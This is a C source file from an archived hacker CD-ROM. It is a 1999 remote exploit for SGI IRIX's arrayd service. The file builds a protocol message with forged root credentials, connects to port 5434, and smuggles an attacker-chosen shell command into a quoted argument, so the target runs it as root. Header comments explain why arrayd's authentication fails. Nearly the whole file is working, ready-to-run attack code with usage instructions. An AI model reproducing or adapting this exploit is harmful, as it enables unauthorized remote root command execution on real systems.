home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_arrayd.c next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  4.5 KB  |  130 lines
  1. /*## copyright LAST STAGE OF DELIRIUM aug 1999 poland        *://lsd-pl.net/ #*/
  2. /*## arrayd                                                                  #*/
  3.  
  4. /*   this code makes the same as the following command invoked with root user */
  5. /*   privileges:                                                              */
  6. /*   /usr/sbin/array -s address launch pvm xxx xxx xxx "\";command;exit\""    */
  7. /*   there are two possible authentication methods that can be used by        */
  8. /*   the arrayd service:                                                      */
  9. /*   AUTHENTICATION NONE                                                      */
  10. /*       requests from anywhere are accepted                                  */
  11. /*   AUTHENTICATION SIMPLE                                                    */
  12. /*       requests from trusted hosts are accepted if they match the host/key  */
  13. /*       from arrayd.auth file. if there is not a specific host/key pair for  */
  14. /*       a given machine the request is also accepted although it should not  */
  15. /*       be (see manual pages in case you dont believe it).                   */
  16. /*       as you see, SGI suggestion to protect arrayd cluster by enabling     */
  17. /*       simple authentication gives no result                                */
  18.  
  19. #include <sys/types.h>
  20. #include <sys/socket.h>
  21. #include <netinet/in.h>
  22. #include <netdb.h>
  23. #include <stdio.h>
  24. #include <errno.h>
  25.  
  26. char msg1[]={
  27.     0x31,0x08,0x12,0x63,0x13,0x54,0x34,0x23,
  28.     0x00,0x00,0x00,0x00,0x12,0x34,0x56,0x78,
  29.     0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x03,
  30.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  31.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
  32.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  33.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
  34.     0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  35. };
  36.  
  37. char msg2[]={
  38.     0x00,0x00,0x00,0x02,0x10,0x00,0x28,0x00,
  39.     0x00,0x00,0x00,0x0f,
  40.  
  41.     0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* array   */
  42.     0x00,0x00,0x00,0x5c,0x12,0x34,0x56,0x78,   /* args    */
  43.     0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x38,   /* creds   */
  44.  
  45.     /* creds */
  46.     0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* origin  */
  47.     0x00,0x00,0x00,0x28,0x00,0x00,0x00,0x05,   /* user    */
  48.     0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x05,   /* group   */
  49.     0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* project */
  50.     0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
  51.  
  52.     'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
  53.     'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
  54.  
  55.     /* args */
  56.     0x00,0x00,0x00,0x06,
  57.     0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x30,
  58.  
  59.     0x00,0x00,0x00,0x3c,0x00,0x00,0x00,0x07,
  60.     0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x04,
  61.     0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x04,
  62.     0x00,0x00,0x00,0x4c,0x00,0x00,0x00,0x04,
  63.     0x00,0x00,0x00,0x50,0x00,0x00,0x00,0x03,
  64.     0x00,0x00,0x00,0x54,0x12,0x34,0x56,0x78,
  65.  
  66.     'l' ,'a' ,'u' ,'n' ,'c' ,'h' ,0x00,0x00,
  67.     'p' ,'v' ,'m' ,0x00,'x' ,'x' ,'x' ,0x00,
  68.     'x' ,'x' ,'x' ,0x00,'x' ,'x' ,'x' ,0x00,
  69. };
  70.  
  71. main(int argc,char **argv){
  72.     char buffer[10000],len[4],*b,*cmd="id";
  73.     int i,c,sck;
  74.     struct sockaddr_in address;
  75.     struct hostent *hp;
  76.  
  77.     printf("copyright LAST STAGE OF DELIRIUM aug 1999 poland  //lsd-pl.net/\n");
  78.     printf("arrayd for irix 6.2 6.3 6.4 6.5 6.5.4 IP:all\n\n");
  79.  
  80.     if(argc<2){
  81.         printf("usage: %s address [-c command]\n",argv[0]);
  82.         exit(-1);
  83.     }
  84.  
  85.     while((c=getopt(argc-1,&argv[1],"c:"))!=-1){
  86.         switch(c){
  87.         case 'c': cmd=optarg;break;
  88.         }
  89.     }
  90.  
  91.     sck=socket(AF_INET,SOCK_STREAM,0);
  92.     bzero(&address,sizeof(address));
  93.  
  94.     address.sin_family=AF_INET;
  95.     address.sin_port=htons(5434);
  96.     if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  97.         if((hp=gethostbyname(argv[1]))==NULL){
  98.             errno=EADDRNOTAVAIL;perror("error");exit(-1);
  99.         }
  100.         memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
  101.     }
  102.     if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
  103.         perror("error");exit(-1);
  104.     }
  105.  
  106.     memcpy(buffer,msg2,sizeof(msg2));
  107.     sprintf(&buffer[sizeof(msg2)],"\";%s;exit\"",cmd);
  108.  
  109.     *(unsigned long*)len=htonl(sizeof(msg2)+strlen(cmd)+8+1);
  110.     b=&msg1[12];
  111.     for(i=0;i<4;i++) *b++=len[i];
  112.  
  113.     write(sck,msg1,64);
  114.     write(sck,buffer,sizeof(msg2)+strlen(cmd)+8+1);
  115.  
  116.     read(sck,buffer,64);
  117.     read(sck,buffer,sizeof(buffer));
  118.  
  119.     b=&buffer[8];
  120.     if((*(unsigned long*)b)!=1){
  121.         printf("error: command refused\n");exit(-1);
  122.     }
  123.     b=&buffer[12];
  124.     if(((*(unsigned long*)b)!=1)&&((*(unsigned long*)b)!=2)){
  125.         printf("error: command not executed\n");exit(-1);
  126.     }
  127.     printf("OK!\n");
  128. }
  129.  
  130.